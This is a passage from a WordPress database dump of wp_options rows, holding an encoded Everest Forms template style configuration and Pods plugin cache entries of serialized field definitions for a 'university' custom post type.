JwbGFjZWhvbGRlcl9mb250X2NvbG9yIjoiI2ZmZmZmZiJ9LCJmaWVsZF9sYWJlbCI6eyJmb250X3NpemUiOiIxNiIsImZvbnRfY29sb3IiOiIjZmZmZmZmIiwiZm9udF9zdHlsZSI6eyJib2xkIjpmYWxzZSwiaXRhbGljIjpmYWxzZSwidW5kZXJsaW5lIjpmYWxzZSwidXBwZXJjYXNlIjpmYWxzZX0sImxpbmVfaGVpZ2h0IjoiMS40IiwibWFyZ2luIjp7ImRlc2t0b3AiOnsidG9wIjoiMTUiLCJyaWdodCI6MCwiYm90dG9tIjoiMTAiLCJsZWZ0IjowfX19LCJmaWVsZF9zdWJsYWJlbCI6eyJmb250X2NvbG9yIjoiI2UwZTBlMCJ9LCJmaWVsZF9kZXNjcmlwdGlvbiI6eyJmb250X2NvbG9yIjoiI2ZmZmZmZiJ9LCJjaGVja2JveF9yYWRpb19zdHlsZXMiOnsiZm9udF9jb2xvciI6IiNmZmZmZmYiLCJzdHlsZV92YXJpYXRpb24iOiJvdXRsaW5lIiwiY29sb3IiOiIjZmZmZmZmIiwiY2hlY2tlZF9jb2xvciI6IiMxMmM4YTMiLCJtYXJnaW4iOnsiZGVza3RvcCI6eyJ0b3AiOjAsInJpZ2h0IjoyMCwiYm90dG9tIjoiMTAiLCJsZWZ0IjowfX0sInNpemUiOiIxNyJ9LCJidXR0b24iOnsiZm9udF9jb2xvciI6IiNmZmZmZmYiLCJiYWNrZ3JvdW5kX2NvbG9yIjoiIzEyYzhhMyIsImJvcmRlcl9jb2xvciI6IiMxMmM4YTMiLCJmb250X3NpemUiOiIxNiIsImJvcmRlcl9yYWRpdXMiOnsidG9wIjoiMCIsInJpZ2h0IjoiMCIsImJvdHRvbSI6IjAiLCJsZWZ0IjoiMCIsInVuaXQiOiJweCJ9LCJsaW5lX2hlaWdodCI6IjEuMyIsInBhZGRpbmciOnsiZGVza3RvcCI6eyJ0b3AiOiIxNSIsInJpZ2h0IjoiNDAiLCJib3R0b20iOiIxNSIsImxlZnQiOiI0MCJ9fSwiaG92ZXJfZm9udF9jb2xvciI6IiNmZmZmZmYiLCJob3Zlcl9iYWNrZ3JvdW5kX2NvbG9yIjoiIzAwYTU4NCIsImJvcmRlcl9ob3Zlcl9jb2xvciI6IiMwMGE1ODQiLCJib3JkZXJfd2lkdGgiOnsidG9wIjoiMiIsInJpZ2h0IjoiMiIsImJvdHRvbSI6IjIiLCJsZWZ0IjoiMiJ9fSwiZmlsZV91cGxvYWRfc3R5bGVzIjp7ImJhY2tncm91bmRfY29sb3IiOiJyZ2JhKDI1NSwyNTUsMjU1LDApIiwiZm9udF9zaXplIjoiMTYiLCJib3JkZXJfd2lkdGgiOnsidG9wIjoiMiIsInJpZ2h0IjoiMiIsImJvdHRvbSI6IjIiLCJsZWZ0IjoiMiJ9LCJib3JkZXJfY29sb3IiOiIjZmZmZmZmIiwicGFkZGluZyI6eyJkZXNrdG9wIjp7InRvcCI6IjI1IiwicmlnaHQiOiIyNSIsImJvdHRvbSI6IjI1IiwibGVmdCI6IjI1In19LCJmb250X2NvbG9yIjoiI2ZmZmZmZiJ9LCJzZWN0aW9uX3RpdGxlIjp7ImZvbnRfc2l6ZSI6IjE4IiwiZm9udF9jb2xvciI6IiNmZmZmZmYifX0=\";s:12:\"preview_link\";s:67:\"https://demo.wpeverest.com/everest-forms/modeling-application-form/\";s:4:\"plan\";a:3:{i:0;s:8:\"personal\";i:1;s:6:\"agency\";i:2;s:17:\"themegrill agency\";}s:6:\"addons\";O:8:\"stdClass\":2:{s:17:\"everest-forms-pro\";s:17:\"Everest Forms Pro\";s:30:\"everest-forms-style-customizer\";s:30:\"Everest Forms Style Customizer\";}s:5:\"image\";s:74:\"https://d3m99fsxk070py.cloudfront.net/images/modeling-application-form.png\";}}}','off'),(5625586,'_transient_timeout_pods_c0c781be8b659e53272cc4b26a809aa8','1782160014','off'),(5625587,'_transient_pods_c0c781be8b659e53272cc4b26a809aa8','a:0:{}','off'),(5625588,'_transient_timeout_pods_3bf4118c9a35df7e4118e524f53637e1','1782160014','off'),(5625589,'_transient_pods_3bf4118c9a35df7e4118e524f53637e1','a:0:{}','off'),(5625590,'_transient_timeout_pods_5bd3cb919ff157e38c95948e13983114','1782160014','off'),(5301447,'wp_notes_notify','1','on'),(5639304,'_transient_timeout_pods_b419e18254d356a9c78b0f89e12fb649','1782523316','off'),(5639305,'_transient_pods_b419e18254d356a9c78b0f89e12fb649','a:25:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}}','off'),(5639306,'_transient_timeout_pods_131768cdcf5d72f4c8f9727a39cfdb4a','1782523316','off'),(5639307,'_transient_pods_131768cdcf5d72f4c8f9727a39cfdb4a','a:28:{s:11:\"object_type\";s:9:\"post_type\";s:4:\"type\";s:9:\"post_type\";s:11:\"object_name\";s:10:\"university\";s:19:\"object_hierarchical\";b:0;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_posts\";s:10:\"meta_table\";s:11:\"wp_postmeta\";s:9:\"pod_table\";s:18:\"wp_pods_university\";s:8:\"field_id\";s:2:\"ID\";s:11:\"field_index\";s:10:\"post_title\";s:10:\"field_slug\";s:9:\"post_name\";s:10:\"field_type\";s:9:\"post_type\";s:12:\"field_parent\";s:11:\"post_parent\";s:19:\"field_parent_select\";s:17:\"`t`.`post_parent`\";s:13:\"meta_field_id\";s:7:\"post_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:0:{}s:5:\"where\";a:1:{s:9:\"post_type\";s:30:\"`t`.`post_type` = \'university\'\";}s:13:\"where_default\";s:34:\"`t`.`post_status` IN ( \'publish\' )\";s:7:\"orderby\";s:51:\"`t`.`menu_order`, `t`.`post_title`, `t`.`post_date`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:24:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:10:\"university\";s:2:\"id\";i:4907;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:12:\"Universities\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:4:\"type\";s:9:\"post_type\";s:7:\"storage\";s:4:\"meta\";s:14:\"label_singular\";s:10:\"University\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:11:\"rest_enable\";s:1:\"1\";s:14:\"supports_title\";s:1:\"1\";s:15:\"supports_editor\";s:1:\"1\";s:12:\"_migrated_28\";s:1:\"1\";s:8:\"required\";s:1:\"0\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_position\";s:1:\"0\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:17:\"show_in_admin_bar\";s:1:\"1\";s:18:\"supports_thumbnail\";s:1:\"1\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:25:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\"